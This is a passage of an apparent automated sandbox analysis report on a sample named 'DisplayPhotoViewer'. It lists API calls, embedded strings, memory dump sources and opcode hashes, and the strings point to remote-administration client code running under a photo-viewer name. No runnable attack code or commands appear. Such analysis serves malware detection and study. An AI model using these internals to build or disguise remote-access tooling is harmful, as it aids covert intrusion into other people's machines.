                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
• API String ID: 3472027048-2181447511
• Opcode ID: ba6b0a06242972b677865cff722bf85bb8d0ce1262fe60012f0f34aa7e761ddf
• Instruction ID: 9e071808c2360e470c9c19801e8b794b24165b97e2317bd6a66cd8554c345fb9
• Opcode Fuzzy Hash: ba6b0a06242972b677865cff722bf85bb8d0ce1262fe60012f0f34aa7e761ddf
• Instruction Fuzzy Hash: 2B110835F0011AABFB14DBB5DC41FBEB7A99B8571CF0401E9E819972C0EE746E4187A1
APIs
• MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?), ref: 1070ED04
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 1070ED17
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 1070ED63
• CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 1070ED7B
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: ByteCharMultiWide$CompareString
• String ID:
• API String ID: 376665442-0
• Opcode ID: 54508fe3e061ea5ccf63e725e8d34fc255693fe6ef409b678752165313e13d86
• Instruction ID: 0ccd13d17297b12f0de3ae8df798ac2b762c8b6fe12acc54d2d368dbe66ec805
• Opcode Fuzzy Hash: 54508fe3e061ea5ccf63e725e8d34fc255693fe6ef409b678752165313e13d86
• Instruction Fuzzy Hash: E2212732A0025DEBCF118F94DD45ADEBFB5FF49760F118629FA14721A0C3329A21DBA0
APIs
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: _free$_malloc_memset
• String ID:
• API String ID: 2102557794-0
• Opcode ID: dd380ccebec616add4d57db5192bb67ae63f0ae5345edbf276a0e8c1d52a71ab
• Instruction ID: fad5a55771693966d439e4905fe36354cef0a59d87746f98efdacf8fe19d4d89
• Opcode Fuzzy Hash: dd380ccebec616add4d57db5192bb67ae63f0ae5345edbf276a0e8c1d52a71ab
• Instruction Fuzzy Hash: CA1129359006456BD351CE18D880FDB7B989F42318F148078FC995F351E6B5F649C7E1
APIs
• GetSystemMetrics.USER32(00000000), ref: 110F1750
• GetSystemMetrics.USER32(0000004C), ref: 110F1773
• GetSystemMetrics.USER32(0000004D), ref: 110F177A
• GetSystemMetrics.USER32(00000001), ref: 110F1781
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
• Opcode ID: 19459ac26326e810422fd0ff1216cc4ad5130b3769f1184bf9a9ae09cd826161
• Instruction ID: 86679de81580e02b043dc5a2f764f4066cdf96cf2115ccb9999bc1937dbb7bc0
• Opcode Fuzzy Hash: 19459ac26326e810422fd0ff1216cc4ad5130b3769f1184bf9a9ae09cd826161
• Instruction Fuzzy Hash: DF0175757002156FE340DAADCC91F6A77E9EF88350F108026FA18CB281DA71DC018B90
APIs
• GetSystemMetrics.USER32(0000004E), ref: 1111D788
• GetSystemMetrics.USER32(0000004F), ref: 1111D78F
• GetSystemMetrics.USER32(00000000), ref: 1111D7AC
• GetSystemMetrics.USER32(00000001), ref: 1111D7B9
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
• Opcode ID: dd2ad85aecdb52b3e78a58338cb9141ec551c57e15f1b879eb0e565802e391c1
• Instruction ID: 16fd7b9be472d3ffde4cdae9415a1af95edf42c405e12a88dce8c27362abea0d
• Opcode Fuzzy Hash: dd2ad85aecdb52b3e78a58338cb9141ec551c57e15f1b879eb0e565802e391c1
• Instruction Fuzzy Hash: C6011971600B559FE720EFB9C984B0AF7E4AF84B18F11C83ED65E8B690D6B4A480CB51
APIs
• CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 11081218
• CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 1108122B
• CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 1108123E
• FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 11081251
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CloseHandle$FreeLibrary
• String ID:
• API String ID: 736098846-0
• Opcode ID: 9c89013b8c280b56233b4b5749a5fe16c2546702e79584811f605015e4725f63
• Instruction ID: 3002e96f0c2727c8da2bfa61eca77fe4a9da450f6d8c3e0cda743c7ae30cc92c
• Opcode Fuzzy Hash: 9c89013b8c280b56233b4b5749a5fe16c2546702e79584811f605015e4725f63
• Instruction Fuzzy Hash: 35F097B1E00B009BC621DF6E98C4ADAFBE9BF99310F64495EE5AAD3214C770A5508B64
APIs
• DestroyWindow.USER32(?,00000000,75BF3760,110F0690), ref: 1112F1F8
• GlobalDeleteAtom.KERNEL32 ref: 1112F206
  • Part of subcall function 1110A800: FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110A80A
  • Part of subcall function 1110A800: SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110A820
• DeleteObject.GDI32(00000000), ref: 1112F23A
• DeleteObject.GDI32(?), ref: 1112F244
  • Part of subcall function 11090E00: _memset.LIBCMT ref: 11090E2F
  • Part of subcall function 11090E00: FreeLibrary.KERNEL32(00000000,?,75C04920,111114D7,00000002), ref: 11090E3A
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Delete$ObjectWindow$AtomDestroyFindFreeGlobalLibraryMessageSend_memset
• String ID:
• API String ID: 370783926-0
• Opcode ID: b777d086da97d39b518410fb75578ca07f674c32d0a97b7475f14864b8c8e2c2
• Instruction ID: a76483d6c816efb8a36a55dc47320649c97d82e7e54d96ea217a1b35ee874967
• Opcode Fuzzy Hash: b777d086da97d39b518410fb75578ca07f674c32d0a97b7475f14864b8c8e2c2
• Instruction Fuzzy Hash: C5F0277AE0062157C211ABA5B880A2FF7E9EFC6708B164029F955D3204DB30F801C7E2
APIs
• LoadCursorA.USER32(00000000,00007F00), ref: 1110B602
• SetCursor.USER32(00000000,?,?,11118766,00000000,00000000,1111CD19,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004), ref: 1110B609
• DestroyCursor.USER32(?), ref: 1110B620
• DestroyCursor.USER32(?), ref: 1110B62D
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$Destroy$Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 3167891023-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 1107D060: IsDBCSLeadByte.KERNEL32(00000000,?,00000000,1107D23A,?,0000005C), ref: 1107D07C
                                                                                                    • CompareStringA.KERNEL32(00000400,00000000,?,0000000A,?,?,?,?,?,0000000A,?,?,?,?,?,?), ref: 1107D70B
                                                                                                      • Part of subcall function 11159A6A: __isdigit_l.LIBCMT ref: 11159A8F
                                                                                                    • _strncmp.LIBCMT ref: 1107D73F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCompareLeadString__isdigit_l_strncmp
                                                                                                    • String ID: {-.
                                                                                                    • API String ID: 3286074029-1528367491
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072A7
                                                                                                    • SetFocus.USER32(?), ref: 11007303
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 1305092643-2167791130
                                                                                                    APIs
                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00008005,00000000,00000000,00000000), ref: 1109B1E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderPath
                                                                                                    • String ID: Journal$JournalPath
                                                                                                    • API String ID: 1514166925-2350371490
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Info
                                                                                                    • String ID: $
                                                                                                    • API String ID: 1807457897-3032137957
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 110091E5
                                                                                                    • _memmove.LIBCMT ref: 11009236
                                                                                                      • Part of subcall function 11008CD0: std::_Xinvalid_argument.LIBCPMT ref: 11008CEA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                    • String ID: string too long
                                                                                                    • API String ID: 2168136238-2556327735
                                                                                                    APIs
                                                                                                    • _strtok.LIBCMT ref: 1103747C
                                                                                                      • Part of subcall function 11158876: __getptd.LIBCMT ref: 11158894
                                                                                                    • _strtok.LIBCMT ref: 1103754C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strtok$__getptd
                                                                                                    • String ID: ; >
                                                                                                    • API String ID: 715173073-2207967850
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _malloc
                                                                                                    • String ID: ..\CTL32\uuencode.c$buf
                                                                                                    • API String ID: 1579825452-878823822
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 110A7873
                                                                                                      • Part of subcall function 110A7540: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110A7883,00000000,00000001,00000000,?,11179C68,000000FF,?,110A82D2,?,?,00000200,?), ref: 110A7554
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110A7571
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110A757E
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110A758C
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110A759A
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110A75A8
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110A75B6
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110A75C4
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110A75D2
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110A75E0
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110A75EE
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardControl), ref: 110A75FC
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110A760A
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110A7618
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110A7626
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110A7634
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110A7642
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,110A82D2,?,?,00000200,?,?,00000400,?,110ED4E1,00000000,00000000,?,?,?), ref: 110A78E2
                                                                                                    Strings
                                                                                                    • winscard.dll is NOT valid!!!, xrefs: 110A788D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad_memset
                                                                                                    • String ID: winscard.dll is NOT valid!!!
                                                                                                    • API String ID: 212038770-1939809930
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F10B
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C58
                                                                                                      • Part of subcall function 11155C43: __CxxThrowException@8.LIBCMT ref: 11155C6D
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C7E
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F122
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                    • String ID: string too long
                                                                                                    • API String ID: 963545896-2556327735
                                                                                                    APIs
                                                                                                    • inet_addr.WSOCK32(00000000,0000003E,?,?), ref: 11047681
                                                                                                    • _free.LIBCMT ref: 11047689
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _freeinet_addr
                                                                                                    • String ID: >
                                                                                                    • API String ID: 1695503834-325317158
                                                                                                    APIs
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?), ref: 1113B0C7
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1113B106
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                                    • String ID: :
                                                                                                    • API String ID: 2034136378-336475711
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11069625
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C58
                                                                                                      • Part of subcall function 11155C43: __CxxThrowException@8.LIBCMT ref: 11155C6D
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C7E
                                                                                                    • _memmove.LIBCMT ref: 11069654
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                    • String ID: vector<T> too long
                                                                                                    • API String ID: 1785806476-3788999226
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11151385
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C58
                                                                                                      • Part of subcall function 11155C43: __CxxThrowException@8.LIBCMT ref: 11155C6D
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C7E
                                                                                                    • _memmove.LIBCMT ref: 111513B0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                    • String ID: vector<T> too long
                                                                                                    • API String ID: 1785806476-3788999226
                                                                                                    • Opcode ID: c3f01f3dac44fab3be25d641e116f09001d0b13cd684952098fd95ec850e1ad5
                                                                                                    • Instruction ID: 793306a1184a9691caea2f9fdb19e15829fa54a7daf16724ffde3244be08563e
                                                                                                    • Opcode Fuzzy Hash: c3f01f3dac44fab3be25d641e116f09001d0b13cd684952098fd95ec850e1ad5
                                                                                                    • Instruction Fuzzy Hash: C201B5B16006069FC794CEADDCC0C6BF7E9EF853183108A2DE466C3644DA30F800C790
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(?), ref: 11103310
                                                                                                    • SendMessageA.USER32(?,0000004A,?,?), ref: 1110332B
                                                                                                    Strings
                                                                                                    • Command %d not sent to player, xrefs: 1110334C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow
                                                                                                    • String ID: Command %d not sent to player
                                                                                                    • API String ID: 701072176-1782338917
                                                                                                    • Opcode ID: 683c1b2571ce18912babb890ca3dafcda8032549e213573af398045f3e798f32
                                                                                                    • Instruction ID: 6102d0bd59fb54a95c25518d1134f763b0e8a8bec9ce6c694c66fac6f498f300
                                                                                                    • Opcode Fuzzy Hash: 683c1b2571ce18912babb890ca3dafcda8032549e213573af398045f3e798f32
                                                                                                    • Instruction Fuzzy Hash: 570175B5E54618AFCB10DF64A8449EEFBF8DB58314F00C16BED04D7340EA71A910CB90
                                                                                                    Strings
                                                                                                    • Error. NULL capbuf, xrefs: 1100B4F1
                                                                                                    • Error. preventing capbuf overflow, xrefs: 1100B516
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                                    • API String ID: 0-3856134272
                                                                                                    • Opcode ID: 85f63e2d8632ab4c1edf8dcf67a9d3e8f756e71d6ca8eb3f7d6b8552f1d4d10a
                                                                                                    • Instruction ID: 76f2803eb917654a7d1380e0bd805bb28217c377c279ab5a499153d0f8d1dfdf
                                                                                                    • Opcode Fuzzy Hash: 85f63e2d8632ab4c1edf8dcf67a9d3e8f756e71d6ca8eb3f7d6b8552f1d4d10a
                                                                                                    • Instruction Fuzzy Hash: 2301A7BAA00A0597DA11DF55F840BDBB3A8DBC037AF04847AEA1E97201D171B59586A2
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __strdup
                                                                                                    • String ID: *this==pszSrc$..\CTL32\NSMString.cpp
                                                                                                    • API String ID: 838363481-1175285396
                                                                                                    • Opcode ID: 83efbe4e5c5a1f05572d8f6e82dcb36550eaa7eefec802349a5589068770bd09
                                                                                                    • Instruction ID: caa2a38f234b78d4e9e419c0afb936ff098d7ad716dd6d423b096c1bbe6f9cce
                                                                                                    • Opcode Fuzzy Hash: 83efbe4e5c5a1f05572d8f6e82dcb36550eaa7eefec802349a5589068770bd09
                                                                                                    • Instruction Fuzzy Hash: 84F02876E003169BC701DE29EC00B9BFBD98F91A68F0880BAE898D7201F531A408CBD1
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(D8458D00,?,110B9B01,?,?,00000000,?,?,?,00000000,1117A940), ref: 1114789C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DestroyWindow
                                                                                                    • String ID: !IsInit()$..\CTL32\WBObject.cpp
                                                                                                    • API String ID: 3375834691-1730213196
                                                                                                    • Opcode ID: 855691944fef47189312d09428b23cb90d211ce78293a9fd12d68452bbaad9b9
                                                                                                    • Instruction ID: 92f6ad26c654526d4a61039a016ecce4be460d543f8edc6109622c0acef19d65
                                                                                                    • Opcode Fuzzy Hash: 855691944fef47189312d09428b23cb90d211ce78293a9fd12d68452bbaad9b9
                                                                                                    • Instruction Fuzzy Hash: 8BF04978A01B028BFB14DF61D954B67BBE4AF80F08F15881CE45A8BE90D7B5E444CBA0
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101B984
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1101B9A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressErrorLastProc
                                                                                                    • String ID: FlashWindowEx
                                                                                                    • API String ID: 199729137-2859592226
                                                                                                    • Opcode ID: 4bf2e561018a0c7d0478fe1e3b0a3f2c437b58e8579c972f02846cc5d4d4c355
                                                                                                    • Instruction ID: 8b4a02ea4a73885b414a6a3535c51dec85437987b9d7171230d9fdef9ace903f
                                                                                                    • Opcode Fuzzy Hash: 4bf2e561018a0c7d0478fe1e3b0a3f2c437b58e8579c972f02846cc5d4d4c355
                                                                                                    • Instruction Fuzzy Hash: FCE01272A446345FC320EFADD884B86F7E89F14765F00442AEA8597544D675E840CBA0
                                                                                                    APIs
                                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11001096
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001091
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
